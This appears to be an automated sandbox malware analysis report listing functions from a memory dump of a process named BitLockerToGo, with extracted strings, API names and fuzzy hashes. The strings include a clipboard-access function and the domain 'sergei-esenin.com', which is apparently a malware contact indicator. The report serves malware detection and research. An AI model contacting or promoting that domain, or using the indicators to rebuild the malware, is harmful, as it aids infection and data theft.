                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: "A1C$*m(o$1Y6[$4`[b$4i<k$56$9M'O$9]-_$:9$;U0W$<I/K$<a[c$=E5G$@qFs$EuEw$IyK{$O!U#$PA$Q1U3$WP$WeQg$]5X7$]i)k$_-]/$h1i?$k>h0$o=K?$x:m<$y5n3$uw
                                                                                                                                                            • API String ID: 0-2269972215
                                                                                                                                                            • Opcode ID: 03a559ddfeca7b8391674ecb4c394752d2d459566a40de705f58b8f5d10fe77b
                                                                                                                                                            • Instruction ID: 540a42f5b2c8655fc7ab95859f4cc758c6e179cb56acad334a16f9351a1cbdc7
                                                                                                                                                            • Opcode Fuzzy Hash: 03a559ddfeca7b8391674ecb4c394752d2d459566a40de705f58b8f5d10fe77b
                                                                                                                                                            • Instruction Fuzzy Hash: 64820AB410C381CBE334CF25D590B9BBBE1BB86304F608A2DE5E99B255DB748446CF96
                                                                                                                                                            Function 00415172 Relevance: 14.8, Strings: 11, Instructions: 1041COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %%,?$.W$7$3-)$3zx$7<0?$II$]H$_Z$xHx~$x|}{$nml
                                                                                                                                                            • API String ID: 0-2043650400
                                                                                                                                                            • Opcode ID: 12c331d8b5d8d13416437651b2242e7253393c52a438c8362e62faa65b91cd90
                                                                                                                                                            • Instruction ID: 0c9f797e28dbec0d448f9598e5e34c6ede17afb7957d05b945e290eb3910d0cb
                                                                                                                                                            • Opcode Fuzzy Hash: 12c331d8b5d8d13416437651b2242e7253393c52a438c8362e62faa65b91cd90
                                                                                                                                                            • Instruction Fuzzy Hash: 3382CCB1900658CBCB14CF54C8916EEBBF1FF8A310F68859DD8956B381D339A981CF98
                                                                                                                                                            Function 00402FE0 Relevance: 10.6, Strings: 8, Instructions: 597COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: .$.$0$[$false$null$true${
                                                                                                                                                            • API String ID: 0-1639024219
                                                                                                                                                            • Opcode ID: 506e684efd0ffdd4ab7bb69053a9423eeae43ab4728bcbfac0cfe82f7bd53f49
                                                                                                                                                            • Instruction ID: 3a7127cf284f2387cd00926aaecbaadf88d0fc53e28a34b27dc9a565adf715e7
                                                                                                                                                            • Opcode Fuzzy Hash: 506e684efd0ffdd4ab7bb69053a9423eeae43ab4728bcbfac0cfe82f7bd53f49
                                                                                                                                                            • Instruction Fuzzy Hash: 521213B4504305ABE7205F25DC457277EECAF4030AF14893EE889A63D2E77EDA14CB5A
                                                                                                                                                            Function 0042A2DC Relevance: 10.4, APIs: 1, Strings: 4, Instructions: 1642COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $F0l$0 :b$TW{O$X\\h
                                                                                                                                                            • API String ID: 0-3330333084
                                                                                                                                                            • Opcode ID: 28783c5e86bae370d3f07f277f63f548a0e807dc07b87e52ba4ef3c7a26c3c43
                                                                                                                                                            • Instruction ID: f2e49855611ed10df372a98b0efb2f7bf2bb7ee0b35f1a2b90431f64137dff9f
                                                                                                                                                            • Opcode Fuzzy Hash: 28783c5e86bae370d3f07f277f63f548a0e807dc07b87e52ba4ef3c7a26c3c43
                                                                                                                                                            • Instruction Fuzzy Hash: 9BC2CC70205B928FD325CF29C5907A7BBE1AF52304F98485EC4EB5B792C739B845CB98
                                                                                                                                                            Function 00431530 Relevance: 9.2, APIs: 6, Instructions: 217clipboardCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1647500905-0
                                                                                                                                                            • Opcode ID: 3dd72b256286a0f18d76cdbb97be187a757415dddf7a079ddd1879fdad43675e
                                                                                                                                                            • Instruction ID: a76234b8b601e4b4d80af0162c0fefcc019d3c38ce0f577428fbbd3ce136ce75
                                                                                                                                                            • Opcode Fuzzy Hash: 3dd72b256286a0f18d76cdbb97be187a757415dddf7a079ddd1879fdad43675e
                                                                                                                                                            • Instruction Fuzzy Hash: 6F81BEF59183419BD700FF74DA0635EBEB0EB9230AF05886DD4C957342E6788558CBA7
                                                                                                                                                            Function 00427B30 Relevance: 5.9, Strings: 4, Instructions: 943COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: +V5H$80I9$X\\h$r/!(
                                                                                                                                                            • API String ID: 0-3448863506
                                                                                                                                                            • Opcode ID: d09c4c3c1042168905b474b04dec1a4fafe80864aa2c59e2f9f0620160f356dd
                                                                                                                                                            • Instruction ID: 1232547257af0d836ecf51d385a685c14159f690ef23018246b655c6a21f7de8
                                                                                                                                                            • Opcode Fuzzy Hash: d09c4c3c1042168905b474b04dec1a4fafe80864aa2c59e2f9f0620160f356dd
                                                                                                                                                            • Instruction Fuzzy Hash: 0262E070209B918BD324CF39D5903A7FBE1AF52305F584A5EC8EB4B792C738A845CB59
                                                                                                                                                            Function 0042866E Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 639COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $F0l$xuy{
                                                                                                                                                            • API String ID: 0-4033455903
                                                                                                                                                            • Opcode ID: d4aa72209cdfe51b31e9bbf1ea66381a8b783033aa52dd2e276fd2dfaa7c6746
                                                                                                                                                            • Instruction ID: 5975b3431e57897a2927422f2e4379087242e99e5fdc322d944cee440e883c9f
                                                                                                                                                            • Opcode Fuzzy Hash: d4aa72209cdfe51b31e9bbf1ea66381a8b783033aa52dd2e276fd2dfaa7c6746
                                                                                                                                                            • Instruction Fuzzy Hash: 4A327570505B928AD321CB35D5907EBBBE1AF16304F84485ED4EE9B382CB397509CFA8
                                                                                                                                                            Function 0040F578 Relevance: 5.7, Strings: 4, Instructions: 685COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 0$2$FM?>$Kj
                                                                                                                                                            • API String ID: 0-1586943010
                                                                                                                                                            • Opcode ID: 7014bca55ce7f15b941fd14ae6b371cb11ea1bf1fc91f27b2d0b860ed8afaba8
                                                                                                                                                            • Instruction ID: 3c4ba65a7b84b13bbd9c5b53dbd9a4e9748074ba4e39680f501424992c42f871
                                                                                                                                                            • Opcode Fuzzy Hash: 7014bca55ce7f15b941fd14ae6b371cb11ea1bf1fc91f27b2d0b860ed8afaba8
                                                                                                                                                            • Instruction Fuzzy Hash: 12329CB15083818FD324DF28C89076BBBE5AF96304F18497EE4C5A7392D739D849CB5A
                                                                                                                                                            Function 004122E6 Relevance: 5.7, Strings: 4, Instructions: 659COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 01$4`[b$F$vh
                                                                                                                                                            • API String ID: 0-3121856630
                                                                                                                                                            • Opcode ID: c75e08152cccaa52ea6f5e526d03dbe727129514ef236bc7209e1ee0a300ff63
                                                                                                                                                            • Instruction ID: d93a5d47dbff73193ef47af5b034dd88a7392ad28107363cc044db854b817e77
                                                                                                                                                            • Opcode Fuzzy Hash: c75e08152cccaa52ea6f5e526d03dbe727129514ef236bc7209e1ee0a300ff63
                                                                                                                                                            • Instruction Fuzzy Hash: 9F22BB71608341ABC714CF28C981BABB7E1EF89354F54892DF4C9D72A1D778D891CB4A
                                                                                                                                                            Function 0041F8B7 Relevance: 5.5, Strings: 4, Instructions: 519COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4`[b$PA$WP$ol
                                                                                                                                                            • API String ID: 0-1411690081
                                                                                                                                                            • Opcode ID: 0cb527afaef1abea81ae9eeaaf4590c194de4ed05548872f7baa8f450dbe5627
                                                                                                                                                            • Instruction ID: aead440d2ca6fe7a1fd06a20e6f63a48c25d3b045c422a0e973e2d67a1ea3f0d
                                                                                                                                                            • Opcode Fuzzy Hash: 0cb527afaef1abea81ae9eeaaf4590c194de4ed05548872f7baa8f450dbe5627
                                                                                                                                                            • Instruction Fuzzy Hash: CC027A74208341CBC724DF28C5906ABB7F1FF89740F55892DE4C987261E738D98ADB9A
                                                                                                                                                            Function 0040D4D0 Relevance: 5.4, Strings: 4, Instructions: 446COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: sergei-esenin.com$sf~g$35$?1
                                                                                                                                                            • API String ID: 0-3600862256
                                                                                                                                                            • Opcode ID: 34ec527317b54b82c586d50cbbbfaf5313a3349e287f7ada78d13b5f4f810efc
                                                                                                                                                            • Instruction ID: 287d7b4e141124ec1853f8441dacd7a8ac6fd4e43e4a782202a225948077304e
                                                                                                                                                            • Opcode Fuzzy Hash: 34ec527317b54b82c586d50cbbbfaf5313a3349e287f7ada78d13b5f4f810efc
                                                                                                                                                            • Instruction Fuzzy Hash: F20266B4A042698FDB24CF94DC947EEBB71FF46301F1445A9E8197B290CB345A82CF58
                                                                                                                                                            Function 004237A0 Relevance: 5.4, Strings: 4, Instructions: 354COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,6B$4BB$P6B$V6B
                                                                                                                                                            • API String ID: 0-2245995098
                                                                                                                                                            • Opcode ID: 7b8c444e9d0daab33cc337e0d0be4236b2f78246795ad0b97ecfb8111a417e31
                                                                                                                                                            • Instruction ID: 2035f7fd695157710a2b672984f3d25332223845817c90881f26e779b6fb85c9
                                                                                                                                                            • Opcode Fuzzy Hash: 7b8c444e9d0daab33cc337e0d0be4236b2f78246795ad0b97ecfb8111a417e31
                                                                                                                                                            • Instruction Fuzzy Hash: 0BC1F3B5A00265CFDB24CF58D8917AEB7B1EF46304F0444AAD44AAB382D738AE41CB55
                                                                                                                                                            Function 00420970 Relevance: 5.3, Strings: 4, Instructions: 341COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4`[b$4`[b$4`[b$}{
                                                                                                                                                            • API String ID: 0-475273664
                                                                                                                                                            • Opcode ID: cc936afc392b63fa08b7f50be1141a5828f0c1a3484ea566103221dba8d8ec3f
                                                                                                                                                            • Instruction ID: ce53842feb3c8665950d37402297c76193c9107afe1c27e40a9be708fb271137
                                                                                                                                                            • Opcode Fuzzy Hash: cc936afc392b63fa08b7f50be1141a5828f0c1a3484ea566103221dba8d8ec3f
                                                                                                                                                            • Instruction Fuzzy Hash: EDB187B5608340DBD700DF18E990A2BB7E1FF8A704F84492DF48997262D739E815CB9A
                                                                                                                                                            Function 00420360 Relevance: 5.2, Strings: 4, Instructions: 210COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,8$0#$4`[b$G#
                                                                                                                                                            • API String ID: 0-1231841115
                                                                                                                                                            • Opcode ID: 63a8e670cd3f321320a73ea7204a99144efd9442fbc58dce641fe461cb0ed3b4
                                                                                                                                                            • Instruction ID: 9cd8ee819c306ef77ec6d8aa264ef613b79a42e954bf5329d783c408745fc08c
                                                                                                                                                            • Opcode Fuzzy Hash: 63a8e670cd3f321320a73ea7204a99144efd9442fbc58dce641fe461cb0ed3b4
                                                                                                                                                            • Instruction Fuzzy Hash: 308178B420C380DFE7289F55E891B5BBBE1FB86704F50892DE1C65B292C774A845CB4A
                                                                                                                                                            Function 00433D5E Relevance: 4.7, Strings: 3, Instructions: 905COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 0$<$>
                                                                                                                                                            • API String ID: 0-1437308683
                                                                                                                                                            • Opcode ID: ce5f5cd2ecc19bcb08e8012a785dd5fc260d3a6e557122c50a5a51424e5e1a63
                                                                                                                                                            • Instruction ID: a5c1a31e08865a8bb2aa65c712a9e7cbb3beaed26c35f48a0901508fa68ac188
                                                                                                                                                            • Opcode Fuzzy Hash: ce5f5cd2ecc19bcb08e8012a785dd5fc260d3a6e557122c50a5a51424e5e1a63
                                                                                                                                                            • Instruction Fuzzy Hash: 758207B2C186808AC700EBB4DD1639E7EF0EF52709F0545EDD6985B386E6748A4CCB67
                                                                                                                                                            Function 0043DC70 Relevance: 4.5, Strings: 3, Instructions: 794COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %7$%7$TC
                                                                                                                                                            • API String ID: 0-562761838
                                                                                                                                                            • Opcode ID: 98285b28069c82770ffc23064106d89e2dd26c25d44d21ba6645de89e21dbe50
                                                                                                                                                            • Instruction ID: a3390a0ea819f50f7e09a005f4fb0df624cd597feb74cf866aa404ef09407691
                                                                                                                                                            • Opcode Fuzzy Hash: 98285b28069c82770ffc23064106d89e2dd26c25d44d21ba6645de89e21dbe50
                                                                                                                                                            • Instruction Fuzzy Hash: 96420135A09206CFCB04CF28D8906AEB7F2FF8A304F29897DD985A7391D735A911CB55
                                                                                                                                                            Function 00415E62 Relevance: 4.5, Strings: 3, Instructions: 752COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: )uw$/^A$^Y
                                                                                                                                                            • API String ID: 0-867195589
                                                                                                                                                            • Opcode ID: a6bb22a4967ca951d5a305e6ffd944ff0515d2462caa79e64008a8f28d3c9f51
                                                                                                                                                            • Instruction ID: 99be8a06345161a7d2b48195821d81a54eebdd34de1f36dcd5d473763174f8cc
                                                                                                                                                            • Opcode Fuzzy Hash: a6bb22a4967ca951d5a305e6ffd944ff0515d2462caa79e64008a8f28d3c9f51
                                                                                                                                                            • Instruction Fuzzy Hash: CF22CEB09002168BDB24CF14C8A2BBBB7B2FF55314F198649D8565F395E339E981CB98
                                                                                                                                                            Function 0043DF90 Relevance: 4.4, Strings: 3, Instructions: 626COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %7$%7$TC
                                                                                                                                                            • API String ID: 0-562761838
                                                                                                                                                            • Opcode ID: 735f6b988e88c19a902557fc86c11b8990785cf3a617012ce579f53b6f5eca15
                                                                                                                                                            • Instruction ID: ad095b83308ca75fd8a4013f0ebfb119efa56f614bf737352143c9b46e94c767
                                                                                                                                                            • Opcode Fuzzy Hash: 735f6b988e88c19a902557fc86c11b8990785cf3a617012ce579f53b6f5eca15
                                                                                                                                                            • Instruction Fuzzy Hash: EB22FF35A04216CFCB04CF68D8906AFB7F2FF8A304F29896DD881A7395D735A911CB95
                                                                                                                                                            Function 00428535 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 725COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 0<1
                                                                                                                                                            • API String ID: 0-2445462277
                                                                                                                                                            • Opcode ID: 7c82265b33f34ae6b3b4960a9ada9cf06471ada781cf8e6c9a3c98d05af78817
                                                                                                                                                            • Instruction ID: 732adb15a570e216f25a42f0fc421c12b11a59c7b995c3155cdc7c8633fe601c
                                                                                                                                                            • Opcode Fuzzy Hash: 7c82265b33f34ae6b3b4960a9ada9cf06471ada781cf8e6c9a3c98d05af78817
                                                                                                                                                            • Instruction Fuzzy Hash: 7F423830204B918BD334CF39D4907A7BBE2AF52314F548A5ED8E74B792C739A849CB59
                                                                                                                                                            Function 00420D30 Relevance: 4.2, Strings: 3, Instructions: 404COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID: ~y$t${?vk
                                                                                                                                                            • API String ID: 2994545307-3090336065
                                                                                                                                                            • Opcode ID: 4efe7c964be661b0714e10038cf83f46b8c9ebe7142d5bc2375b62523062975f
                                                                                                                                                            • Instruction ID: e10378fa62e7c81c123d42e80a001619ac457b0f4a0d329f6ac98bfb666bfe04
                                                                                                                                                            • Opcode Fuzzy Hash: 4efe7c964be661b0714e10038cf83f46b8c9ebe7142d5bc2375b62523062975f
                                                                                                                                                            • Instruction Fuzzy Hash: 86B100717083508BD714DF28E890B2BB7E2EFA5304F55492EE585873A2D339EC45CB9A
                                                                                                                                                            Function 0042F4C7 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 632memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocString
                                                                                                                                                            • String ID: 0
                                                                                                                                                            • API String ID: 2525500382-4108050209
                                                                                                                                                            • Opcode ID: 3af0b670d267ad09d00f325ce7c903cf7bfea799d020b32faf102f16ac3abf35
                                                                                                                                                            • Instruction ID: bfb33143b9dcc868689a04b056aba8646cbeba0911787d759a7d2a88c05017e2
                                                                                                                                                            • Opcode Fuzzy Hash: 3af0b670d267ad09d00f325ce7c903cf7bfea799d020b32faf102f16ac3abf35
                                                                                                                                                            • Instruction Fuzzy Hash: D54282B182D7808AC310FF79D91635BBEE0EF6230AF45886DD4D94B282E274455CDB67
                                                                                                                                                            Function 00436E82 Relevance: 4.1, Strings: 3, Instructions: 319COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4`[b$YmC$rnC
                                                                                                                                                            • API String ID: 0-59352368
                                                                                                                                                            • Opcode ID: badf3ea7929c867e39bcd7ee1c88f0f2dfc5419602b87f973e397e8d097d2991
                                                                                                                                                            • Instruction ID: deb9105ce3a23a52add02b07606881298042af04edd39c8760c576839aa4ad74
                                                                                                                                                            • Opcode Fuzzy Hash: badf3ea7929c867e39bcd7ee1c88f0f2dfc5419602b87f973e397e8d097d2991
                                                                                                                                                            • Instruction Fuzzy Hash: E4A104B5A0820ACFDB24CFA4DC906BFB7B2FB49304F14456DD65267380D739A912CB98
                                                                                                                                                            Function 0042AE2B Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 517memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocString
                                                                                                                                                            • String ID: 0
                                                                                                                                                            • API String ID: 2525500382-4108050209
                                                                                                                                                            • Opcode ID: dd283732bf8849cdfeb91f3e454f6fc2a277198a0de7caf5cd01dda164c0a2de
                                                                                                                                                            • Instruction ID: c36ff4eb4e8d725c516780d075127ab2ec9eb111ec197b2971883632229e0c61
                                                                                                                                                            • Opcode Fuzzy Hash: dd283732bf8849cdfeb91f3e454f6fc2a277198a0de7caf5cd01dda164c0a2de
                                                                                                                                                            • Instruction Fuzzy Hash: D042F9B210DB818AD320EF60C65639FBEE1FBA1746F058C5ED1D947283E6788545CB27
                                                                                                                                                            Function 00413888 Relevance: 4.0, Strings: 3, Instructions: 249COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4`[b$4`[b$D
                                                                                                                                                            • API String ID: 0-2855741908
                                                                                                                                                            • Opcode ID: bee589adc475eb55dc856cc6db7432ca305c854b6497f41265853fe96f3c0c6b
                                                                                                                                                            • Instruction ID: 4419554b97a4f5d847f5d9919b56110a744d44bceafc1c0fee32142145e074b9
                                                                                                                                                            • Opcode Fuzzy Hash: bee589adc475eb55dc856cc6db7432ca305c854b6497f41265853fe96f3c0c6b
                                                                                                                                                            • Instruction Fuzzy Hash: DC816BB4208340EFD3149F55D4A076BBBE5FF86305F50892DE1C6473A0C3799951CB8A
                                                                                                                                                            Function 0041F862 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
